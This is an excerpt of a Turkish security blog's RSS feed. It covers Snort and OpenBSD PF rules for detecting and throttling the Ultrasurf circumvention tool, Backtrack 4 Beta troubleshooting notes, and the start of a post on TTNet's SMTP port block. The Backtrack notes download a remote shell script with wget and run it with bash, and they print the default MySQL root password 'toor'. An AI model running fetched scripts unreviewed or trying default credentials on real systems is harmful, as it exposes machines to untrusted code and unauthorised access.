			<content:encoded><![CDATA[<p>Ultrasurf antisansür yazılımı çeşitli network güvenlik cihazlarına yakalanmamak için çok akıllı yöntemler kullanıyor. Mesela ilk başlatıldığında çeşitli gerçek  domain isimlerine dns istekleri gönderiyor, bilinen sitelere(intel.com, microsoft.com, cnn.com vs  443. porttan bağlanmaya çalışıyor) arada da kendi proxylerine bağlantı isteği gönderiyor ve bağlantı kurabilirse devam ediyor, kuramazsa diğer proxy ip adreslerini deniyor. Böylece ip adresinden bloklama yapmak isteyenler logları izleyerek bloklama yaparlarsa gerçek ip adreslerine giden istekleri de bloklamış oluyorlar.</p>
<p>Vakti zamanında ip adresinden bloklamak için 200&#8242;e yakın ipye bağlantı yaptığını bulup bloklamıştım ama yetmedi:). Dolayısıyla bu işin ip bloklayarak olmayacağına bir iki gün kaybederek öğrendim.</p>
<p>Açık kod saldırı tespit ve engelleme sistemi Snort&#8217;un e-posta listelerinde de geçen gün Ultrasurf konusu açılmıştı. Birileri de hemen bir iki imza yazıp gönderdi listeye.  Malesef ki imzalar tamamen ip adreslerine yapılan bağlantıları izlemeye ve dns isteklerini yakalamaya yönelikti. Her iki imza da gerçekte bloklama işine yaramıyor. Snort kurallarını inceleyerke neden işe yaramayacağına bakalım</p>
<p><strong>İlk Snort kuralı;</strong></p>
<blockquote><p># Rule by SERPRO-Recife Security Team<br />
alert udp $HOME_NET any -&gt; $EXTERNAL_NET  53 (msg:&#8221;Possible External Ultrasurf  DNS Query&#8221;; content:&#8221;|00 00 00 00 00 00 00 00 00 00 00 00<br />
00 00 00 00 00 00 00 00 00 00|&#8221;; classtype: policy-violation;threshold:type limit, track by_src,count 1, seconds5; sid: 1000059; rev:2; )</p></blockquote>
<p>Bu kural Ultrasurf dns isteklerini yakalaybilse de alakasız dns isteklerini de yakalıyor. Yani false positive oranı çok yüksek bir kural, dolayısıyla engelleme için kullanılamaz.<br />
<strong><br />
İkinci Snort kuralı;</strong></p>
<blockquote><p># IP POOL by Augusto Ferronato</p>
<p>var ULTRASURF_POOL<br />
[205.196.136.9,210.21.31.114,118.171.251.158,202.75.48.227,61.197.186.36,202.99.10.38,131.107.100.158,66.249.93.102,218.169.186.93,203.13.134.161,59.117.240.222,72.246.89.133,114.45.22.115,<br />
198.22.236.38,70.85.195.236,220.138.148.35,59.117.240.222,118.161.206.194,67.137.230.73,220.136.233.18,<br />
208.96.32.3,65.49.14.12,61.197.186.36,64.62.138.28,195.39.222.218,202.67.56.65,65.49.14.12,114.44.44.158,<br />
210.208.94.226,203.30.164.150,64.38.220.186,202.99.10.38,219.85.5.60]</p>
<p>alert tcp $HOME_NET any -&gt; $ULTRASURF_POOL 443 (msg:&#8221;Ultrasurf<br />
Connection Detected&#8221;; flow:established;classtype:policy-violation;<br />
sid:5000000; rev:3;)</p></blockquote>
<p>Bu da kısaca yukarıda belirtilen ip adreslerine yapılan 443 TCP bağlantılarını gördüğünde uyarı veren kural ve false positive çok yatkın zira aralarında gerçek sitelere ait ip adresleri de geçiyor. Ek olarak bunları bloklamaya başladığınızda Ultrasurf anında başka ip adreslerine bağlantı kurarak sizi uğraşlarınızla başbaşa bırakacaktır.</p>
<p>Peki nasıl bloklama yapacağım? Piyasada network seviyesinde sağlıklı bloklama yapabilen ticari IPS ürünleri olduğunu biliyoruz.</p>
<p>Bloklama konusunda en iyi ve en kesin yöntemi Squid ile anlatmıştım ama herkes Squid kullanmadığı için çoğu ortama uymuyor. Ben de bir arkadaş için alternatif yöntemler düşünürken aklıma aşağıda anlatacağım bloklama yöntemi geldi.</p>
<p><strong>Firewall ile Ultrasurf bloklama;</strong></p>
<p>Ultrasurf&#8217;ün bir özelliği de eğer bloklama yoksa proxy bağlantılarını hep aynı ip adresi üzerinden yapması. Eğer bu ip adresini bulabilirsem(Ultrasurf çalıştırıp 443. portu dinlemek ve sonrasında Explorer üzerinden internette gezinmek ip adresini bulmaya yetecektir.) sonra kullandığım güvenlik duvarından bu ip adresine giden paketlerin bandwidth değerini 5-6 Kb&#8217;e ayarlarsam hem ultrasurf ilgili ip adresine ulaşabileceği için ip adresi değiştirmeyecektir hem de Ultrasurf kullanan kişi bağlantının yavaşlığından dolayı Ultrasurf kullanmaktan vazgeçecektir:)</p>
<p>Yukardaki senaryoyu anlatan Packet Filter Güvenlik Duvarı Kuralı</p>
<blockquote><p>ext_if=&#8221;vic0&#8243;<br />
int_if=&#8221;vic2&#8243;</p>
<p>&#8230;<br />
altq on $int_if cbq bandwidth 1Mb queue {ultrasurf, others}<br />
queue ultrasurf bandwidth 6Kb<br />
queue others bandwidth 994Kb cbq(default)<br />
nat on $ext_if from !($ext_if)  ($ext_if:0)<br />
pass in quick on $int_if proto tcp from any to  65.49.2.113 port 443 queue ultrasurf<br />
&#8230;.</p></blockquote>
<p>Diğer bir yöntem de yukarıdaki Snort kuralını aktif ederek hangi ip adreslerinin Ultrasurf kullandığını belirlemek ve ilgili ip adreslerinin sahiplerini uyarmak. Yukardaki ip adresleri eğer engelleme yapılmazsa Ultrasurf 9.4 versiyonunun default olarak ilk denediği ip adresleridir.</p>
<p>Bu işe kesin çözüm için yapılması gereken:</p>
<p>443. TCP portunu dinleyerel TLS1 bağlantılarında server hello mesajı içerisinde sertifika bilgisini aramaktır. Ultrasurf TLS bağlantısı  kuruyor gözükse de sunucu tarafı hello mesajında sertifika göndermiyor IPS ile bu alanı kontrol edip sertifika alanı boş olan TLS paketlerini bloklamak kesin çözüm olacaktır.</p>
<p><img class="aligncenter size-full wp-image-1150" title="gmail-tls" src="http://blog.lifeoverip.net/wp-content/uploads/2009/05/gmail-tls.jpg" alt="gmail-tls" width="931" height="372" /></p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;title=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29&amp;bodytext=Ultrasurf%20antisans%C3%BCr%20yaz%C4%B1l%C4%B1m%C4%B1%20%C3%A7e%C5%9Fitli%20network%20g%C3%BCvenlik%20cihazlar%C4%B1na%20yakalanmamak%20i%C3%A7in%20%C3%A7ok%20ak%C4%B1ll%C4%B1%20y%C3%B6ntemler%20kullan%C4%B1yor.%20Mesela%20ilk%20ba%C5%9Flat%C4%B1ld%C4%B1%C4%9F%C4%B1nda%20%C3%A7e%C5%9Fitli%20ger%C3%A7ek%C2%A0%20domain%20isimlerine%20dns%20istekleri%20g%C3%B6nderiyor%2C%20bilinen%20sitelere%28inte" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;title=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29&amp;notes=Ultrasurf%20antisans%C3%BCr%20yaz%C4%B1l%C4%B1m%C4%B1%20%C3%A7e%C5%9Fitli%20network%20g%C3%BCvenlik%20cihazlar%C4%B1na%20yakalanmamak%20i%C3%A7in%20%C3%A7ok%20ak%C4%B1ll%C4%B1%20y%C3%B6ntemler%20kullan%C4%B1yor.%20Mesela%20ilk%20ba%C5%9Flat%C4%B1ld%C4%B1%C4%9F%C4%B1nda%20%C3%A7e%C5%9Fitli%20ger%C3%A7ek%C2%A0%20domain%20isimlerine%20dns%20istekleri%20g%C3%B6nderiyor%2C%20bilinen%20sitelere%28inte" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;t=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;title=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;title=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29&amp;annotation=Ultrasurf%20antisans%C3%BCr%20yaz%C4%B1l%C4%B1m%C4%B1%20%C3%A7e%C5%9Fitli%20network%20g%C3%BCvenlik%20cihazlar%C4%B1na%20yakalanmamak%20i%C3%A7in%20%C3%A7ok%20ak%C4%B1ll%C4%B1%20y%C3%B6ntemler%20kullan%C4%B1yor.%20Mesela%20ilk%20ba%C5%9Flat%C4%B1ld%C4%B1%C4%9F%C4%B1nda%20%C3%A7e%C5%9Fitli%20ger%C3%A7ek%C2%A0%20domain%20isimlerine%20dns%20istekleri%20g%C3%B6nderiyor%2C%20bilinen%20sitelere%28inte" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F&amp;title=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=Ultrasurf%20Bloklama-II%28Snort%2C%20OpenBSD%20PF%29%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F05%2F17%2Fultrasurf-bloklama-iisnort-openbsd-pf%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2010/05/02/snort-kullanarak-ultrasurf-engelleme/' rel='bookmark' title='Permanent Link: Snort kullanarak Ultrasurf engelleme'>Snort kullanarak Ultrasurf engelleme</a></li>
<li><a href='http://blog.lifeoverip.net/2007/05/20/openbsd-snort-nips-olarak-kullanmaksnort_inline-for-openbsd/' rel='bookmark' title='Permanent Link: OpenBSD &amp; Snort NIPS Olarak Kullanmak(snort_inline for OpenBSd)'>OpenBSD &amp; Snort NIPS Olarak Kullanmak(snort_inline for OpenBSd)</a></li>
<li><a href='http://blog.lifeoverip.net/2009/05/17/ultrasurf-ile-firewall-kurallarini-asma/' rel='bookmark' title='Permanent Link: Ultrasurf ile Firewall kurallarını aşma'>Ultrasurf ile Firewall kurallarını aşma</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/05/17/ultrasurf-bloklama-iisnort-openbsd-pf/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Backtrack 4 Sorunları ve Cozum Yolları</title>
		<link>http://blog.lifeoverip.net/2009/04/25/backtrack-4-sorunlari-ve-cozum-yollari/</link>
		<comments>http://blog.lifeoverip.net/2009/04/25/backtrack-4-sorunlari-ve-cozum-yollari/#comments</comments>
		<pubDate>Sat, 25 Apr 2009 16:24:25 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Misc]]></category>
		<category><![CDATA[Security Tools]]></category>
		<category><![CDATA[Backtrack]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1066</guid>
		<description><![CDATA[Backtrack 4 Beta çıkalı yaklaşık iki ay oluyor. Bu zaman zarfında Beta ismini hakedecek bazı eksiklikler olduğunu kullananlar farketmişlerdir. Ben de eğitim için Backtrack CDleri hazırlarken bazı hatalarla karşılaşıyorum. Anlık uyguladığım çözümler yeterli olsa da aynı sorunlarla tekrar karşılaştığımda ne yaptığımı unutmuş oluyorum. Bu yazı da tekrar tekrar aynı şeyleri yapmamak için alınan notları barındırıyor. [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2007/05/14/sudo-ile-detayli-komut-loglama/' rel='bookmark' title='Permanent Link: sudo ile detayli komut loglama'>sudo ile detayli komut loglama</a></li>
<li><a href='http://blog.lifeoverip.net/2009/06/06/agda-kullanilmayan-ip-adreslerini-bulma/' rel='bookmark' title='Permanent Link: Agda Kullanilmayan IP Adreslerini Bulma'>Agda Kullanilmayan IP Adreslerini Bulma</a></li>
<li><a href='http://blog.lifeoverip.net/2009/02/21/backtrack-4e-nessus-kurulumu/' rel='bookmark' title='Permanent Link: Backtrack 4&#8242;e Nessus Kurulumu'>Backtrack 4&#8242;e Nessus Kurulumu</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Backtrack 4 Beta çıkalı yaklaşık iki ay oluyor. Bu zaman zarfında Beta ismini hakedecek bazı eksiklikler olduğunu kullananlar farketmişlerdir. Ben de eğitim için Backtrack CDleri hazırlarken bazı hatalarla karşılaşıyorum.</p>
<p>Anlık uyguladığım çözümler yeterli olsa da aynı sorunlarla tekrar karşılaştığımda ne yaptığımı unutmuş oluyorum. Bu yazı da tekrar tekrar aynı şeyleri yapmamak için alınan notları barındırıyor.</p>
<p>Eğer siz de benzeri hatalar yaşıyorsanız ve burada yer almıyorsa yorumlarınızla zenginleştirebilirsiniz.</p>
<p>Not: Burada yazılanların tümü Vmware sürümü için geçerlidir.<br />
<strong>1) apt-get update komutu sonrası çıkan hataları düzeltmek</strong></p>
<p>#apt-get update komutu çalıştırıldıktan sonra bazı depoların pubkeylerinin eksik olması sebebiyle aşağıdaki hata alınabilir.</p>
<p>Fetched 704B in 2s (328B/s)<br />
Reading package lists&#8230; Done<br />
W: GPG error: http://ppa.launchpad.net intrepid Release: The following signatures couldn&#8217;t be verified because the public key is not available: NO_PUBKEY CB2F6C86F77B1CA9<br />
W: GPG error: http://apt.wicd.net gutsy Release: The following signatures couldn&#8217;t be verified because the public key is not available: NO_PUBKEY FEC820F4B8C0755A<br />
W: GPG error: http://apt.wicd.net intrepid Release: The following signatures couldn&#8217;t be verified because the public key is not available: NO_PUBKEY FEC820F4B8C0755A<br />
W: You may want to run apt-get update to correct these problems</p>
<p>Bu sorunu çözebilmek için</p>
<blockquote><p><strong>root@home-labs:~# gpg &#8211;keyserver keyserver.ubuntu.com &#8211;recv CB2F6C86F77B1CA9</strong><br />
gpg: directory `/root/.gnupg&#8217; created<br />
gpg: new configuration file `/root/.gnupg/gpg.conf&#8217; created<br />
gpg: WARNING: options in `/root/.gnupg/gpg.conf&#8217; are not yet active during this run<br />
gpg: keyring `/root/.gnupg/secring.gpg&#8217; created<br />
gpg: keyring `/root/.gnupg/pubring.gpg&#8217; created<br />
gpg: requesting key F77B1CA9 from hkp server keyserver.ubuntu.com<br />
gpg: /root/.gnupg/trustdb.gpg: trustdb created<br />
gpg: key F77B1CA9: public key &#8220;Launchpad PPA for Timothy Pearson&#8221; imported<br />
gpg: Total number processed: 1<br />
gpg:               imported: 1  (RSA: 1)<br />
<strong>root@home-labs:~# gpg &#8211;keyserver keyserver.ubuntu.com &#8211;recv FEC820F4B8C0755A</strong><br />
gpg: requesting key B8C0755A from hkp server keyserver.ubuntu.com<br />
gpg: key B8C0755A: public key &#8220;Adam Blackburn &lt;compwiz18@gmail.com&gt;&#8221; imported<br />
gpg: no ultimately trusted keys found<br />
gpg: Total number processed: 1<br />
gpg:               imported: 1<br />
<strong></strong></p>
<p><strong>root@home-labs:~# gpg &#8211;export &#8211;armor  CB2F6C86F77B1CA9|apt-key add -</strong><br />
OK<br />
<strong>root@home-labs:~# gpg &#8211;export &#8211;armor  FEC820F4B8C0755A|apt-key add -</strong><br />
OK</p></blockquote>
<p>Yukardaki komutlar çalıştırıldıktan sonra tekrar apt-get update komutu çalıştırılırsa herhangi bir hata almadan işlem tamamlanacaktır.</p>
<blockquote><p><strong>#apt-get update </strong></p>
<p>&#8230;</p>
<p>..Hit http://apt.wicd.net intrepid/extras Packages<br />
Fetched 704B in 2s (324B/s)<br />
Reading package lists&#8230; Done</p></blockquote>
<p><strong>2)apt-get upgrade komutu sonrası KDE&#8217;nin açılmaması problemi</strong></p>
<p>apt-get upgrade komutu ile sistemi güncellemek isterseniz bu işlem sonrasında konsoldan çalıştıracağınız startx komutu aşağıdakine benzer bir arabirim açacaktır.</p>
<p style="text-align: center;"><img class="size-full wp-image-1070 aligncenter" title="bt1" src="http://blog.lifeoverip.net/wp-content/uploads/2009/04/bt1.png" alt="bt1" width="902" height="261" /></p>
<p style="text-align: center;">
<p style="text-align: left;">Arabirimde tekrar KDE&#8217;nin açılmasını isterseniz aşağıdaki komutları çalıştırıp X&#8217;i restart etmeniz yeterli olacaktır.</p>
<p style="text-align: left;">
<blockquote><p><strong># wget www.offensive-security.com/fix-kde.sh</strong><br />
&#8211;2009-04-25 09:09:55&#8211;  http://www.offensive-security.com/fix-kde.sh<br />
Resolving www.offensive-security.com&#8230; 208.88.120.8<br />
Connecting to www.offensive-security.com|208.88.120.8|:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 741 [application/x-sh]<br />
Saving to: `fix-kde.sh&#8217;</p>
<p>100%[=========================================================================================&gt;] 741         &#8211;.-K/s   in 0s</p>
<p>2009-04-25 09:09:56 (50.1 MB/s) &#8211; `fix-kde.sh&#8217; saved [741/741]</p>
<p><strong>root@home-labs:~# bash fix-kde.sh</strong><br />
[*] Please restart X</p></blockquote>
<p><strong>3) Mysql&#8217;e bağlanamama sorunu</strong></p>
<p>Mysql servisini başlattıktan sonra root olarak bağlanamıyorsanız</p>
<blockquote><p><strong>root@home-labs:~# /etc/init.d/mysql start</strong><br />
* Starting MySQL database server mysqld                                                                                                                                   [ OK ]<br />
* Checking for corrupt, not cleanly closed and upgrade needing tables.<br />
<strong>root@home-labs:~# mysql</strong><br />
ERROR 1045 (28000): Access denied for user &#8216;root&#8217;@'localhost&#8217; (using password: NO)<strong></p>
<p></strong></p></blockquote>
<p>toor parolası ile deneyin.</p>
<blockquote><p><strong>root@home-labs:~# mysql -u root -p</strong><br />
Enter password: toor<br />
Welcome to the MySQL monitor.  Commands end with ; or \g.<br />
Your MySQL connection id is 27<br />
Server version: 5.0.67-0ubuntu6 (Ubuntu)</p>
<p>Type &#8216;help;&#8217; or &#8216;\h&#8217; for help. Type &#8216;\c&#8217; to clear the buffer.</p>
<p>mysql&gt;</p></blockquote>
<p><strong>4)Linux KernelkKaynak kodları</strong></p>
<p>Linux kernel kaynak kodlarına ihtiyac duyan bir uygulama icin gösterilecek yol bilgisi: /usr/src/linux</p>
<p>Bir başka yazıda Backtrack 4 ile birlikte gelmeyen fakat bir güvenlikcinin alet çantasında  bulunması gereken yazılımları aktarmayı planlıyorum.</p>
<p><strong>5)KDE Çözünürlük hatası</strong></p>
<p>KDE ile ilgili çözünürlük problemi yaşıyorsanız bunu çözmek için startx komutundan önce fixvmware komutunu çalışırmanız gerekiyor(Ben bu problemi yaşamadım, forumlarda yaşayanlar olduğunu görünce buraya almak istedim)</p>



Share and Enjoy:


	<a rel="nofollow"  href="http://www.printfriendly.com/print?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;partner=sociable" title="Print"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/printfriendly.png" title="Print" alt="Print" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;title=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1&amp;bodytext=Backtrack%204%20Beta%20%C3%A7%C4%B1kal%C4%B1%20yakla%C5%9F%C4%B1k%20iki%20ay%20oluyor.%20Bu%20zaman%20zarf%C4%B1nda%20Beta%20ismini%20hakedecek%20baz%C4%B1%20eksiklikler%20oldu%C4%9Funu%20kullananlar%20farketmi%C5%9Flerdir.%20Ben%20de%20e%C4%9Fitim%20i%C3%A7in%20Backtrack%20CDleri%20haz%C4%B1rlarken%20baz%C4%B1%20hatalarla%20kar%C5%9F%C4%B1la%C5%9F%C4%B1yorum.%0D%0A%0D%0AAnl%C4%B1k%20u" title="Digg"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/digg.png" title="Digg" alt="Digg" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F" title="Sphinn"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/sphinn.png" title="Sphinn" alt="Sphinn" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://delicious.com/post?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;title=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1&amp;notes=Backtrack%204%20Beta%20%C3%A7%C4%B1kal%C4%B1%20yakla%C5%9F%C4%B1k%20iki%20ay%20oluyor.%20Bu%20zaman%20zarf%C4%B1nda%20Beta%20ismini%20hakedecek%20baz%C4%B1%20eksiklikler%20oldu%C4%9Funu%20kullananlar%20farketmi%C5%9Flerdir.%20Ben%20de%20e%C4%9Fitim%20i%C3%A7in%20Backtrack%20CDleri%20haz%C4%B1rlarken%20baz%C4%B1%20hatalarla%20kar%C5%9F%C4%B1la%C5%9F%C4%B1yorum.%0D%0A%0D%0AAnl%C4%B1k%20u" title="del.icio.us"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/delicious.png" title="del.icio.us" alt="del.icio.us" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.facebook.com/share.php?u=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;t=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1" title="Facebook"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/facebook.png" title="Facebook" alt="Facebook" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;title=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1" title="Mixx"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/mixx.png" title="Mixx" alt="Mixx" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;title=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1&amp;annotation=Backtrack%204%20Beta%20%C3%A7%C4%B1kal%C4%B1%20yakla%C5%9F%C4%B1k%20iki%20ay%20oluyor.%20Bu%20zaman%20zarf%C4%B1nda%20Beta%20ismini%20hakedecek%20baz%C4%B1%20eksiklikler%20oldu%C4%9Funu%20kullananlar%20farketmi%C5%9Flerdir.%20Ben%20de%20e%C4%9Fitim%20i%C3%A7in%20Backtrack%20CDleri%20haz%C4%B1rlarken%20baz%C4%B1%20hatalarla%20kar%C5%9F%C4%B1la%C5%9F%C4%B1yorum.%0D%0A%0D%0AAnl%C4%B1k%20u" title="Google Bookmarks"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/googlebookmark.png" title="Google Bookmarks" alt="Google Bookmarks" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F&amp;title=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1" title="StumbleUpon"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/stumbleupon.png" title="StumbleUpon" alt="StumbleUpon" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://technorati.com/faves?add=http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F" title="Technorati"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/technorati.png" title="Technorati" alt="Technorati" class="sociable-hovers" /></a>
	<a rel="nofollow"  href="http://twitter.com/home?status=Backtrack%204%20Sorunlar%C4%B1%20ve%20Cozum%20Yollar%C4%B1%20-%20http%3A%2F%2Fblog.lifeoverip.net%2F2009%2F04%2F25%2Fbacktrack-4-sorunlari-ve-cozum-yollari%2F" title="Twitter"><img src="http://blog.lifeoverip.net/wp-content/plugins/sociable/images/twitter.png" title="Twitter" alt="Twitter" class="sociable-hovers" /></a>


<br/><br/>

<p>Related posts:<ol><li><a href='http://blog.lifeoverip.net/2007/05/14/sudo-ile-detayli-komut-loglama/' rel='bookmark' title='Permanent Link: sudo ile detayli komut loglama'>sudo ile detayli komut loglama</a></li>
<li><a href='http://blog.lifeoverip.net/2009/06/06/agda-kullanilmayan-ip-adreslerini-bulma/' rel='bookmark' title='Permanent Link: Agda Kullanilmayan IP Adreslerini Bulma'>Agda Kullanilmayan IP Adreslerini Bulma</a></li>
<li><a href='http://blog.lifeoverip.net/2009/02/21/backtrack-4e-nessus-kurulumu/' rel='bookmark' title='Permanent Link: Backtrack 4&#8242;e Nessus Kurulumu'>Backtrack 4&#8242;e Nessus Kurulumu</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://blog.lifeoverip.net/2009/04/25/backtrack-4-sorunlari-ve-cozum-yollari/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>TTNet&#8217;in SMTP Portunu Kapatması Uzerine</title>
		<link>http://blog.lifeoverip.net/2009/04/14/ttnetin-smtp-portunu-kapatmasi-uzerine/</link>
		<comments>http://blog.lifeoverip.net/2009/04/14/ttnetin-smtp-portunu-kapatmasi-uzerine/#comments</comments>
		<pubDate>Tue, 14 Apr 2009 19:33:47 +0000</pubDate>
		<dc:creator>Huzeyfe ONAL</dc:creator>
				<category><![CDATA[Linux Security]]></category>
		<category><![CDATA[Misc]]></category>
		<category><![CDATA[Qmail]]></category>
		<category><![CDATA[System Security]]></category>

		<guid isPermaLink="false">http://blog.lifeoverip.net/?p=1033</guid>
		<description><![CDATA[Bu konuda turk.internet.com için hazırladığım yazıya aşağıdaki adreslerden erişilebilir http://turk.internet.com/haber/yazigoster.php3?yaziid=23903 http://turk.internet.com/haber/yazigoster.php3?yaziid=23904 TTNet&#8217;in  ADSL networkünden yayılan spamlere çare olması amacıyla başlattığı &#8220;Şimdi E-posta Kutunuz Daha Güvenli! &#8220;  projesi malesef ki yeteri kadar anlaşılamadı.  Bu yazıda kısaca TTNet&#8217;in SMTP portunu kapatarak spame nasıl çözüm bulacağı konusunda değerlendirmelerimi aktaracağım. Proje kapsamında dinamik IPli ADSL abonelerinin tcp/25(SMTP) portu dış [...]


Related posts:<ol><li><a href='http://blog.lifeoverip.net/2009/07/23/ttnet-adsl-ucretsiz-kullanma-rehberi/' rel='bookmark' title='Permanent Link: TTNet ADSL Ücretsiz Kullanma Rehberi'>TTNet ADSL Ücretsiz Kullanma Rehberi</a></li>
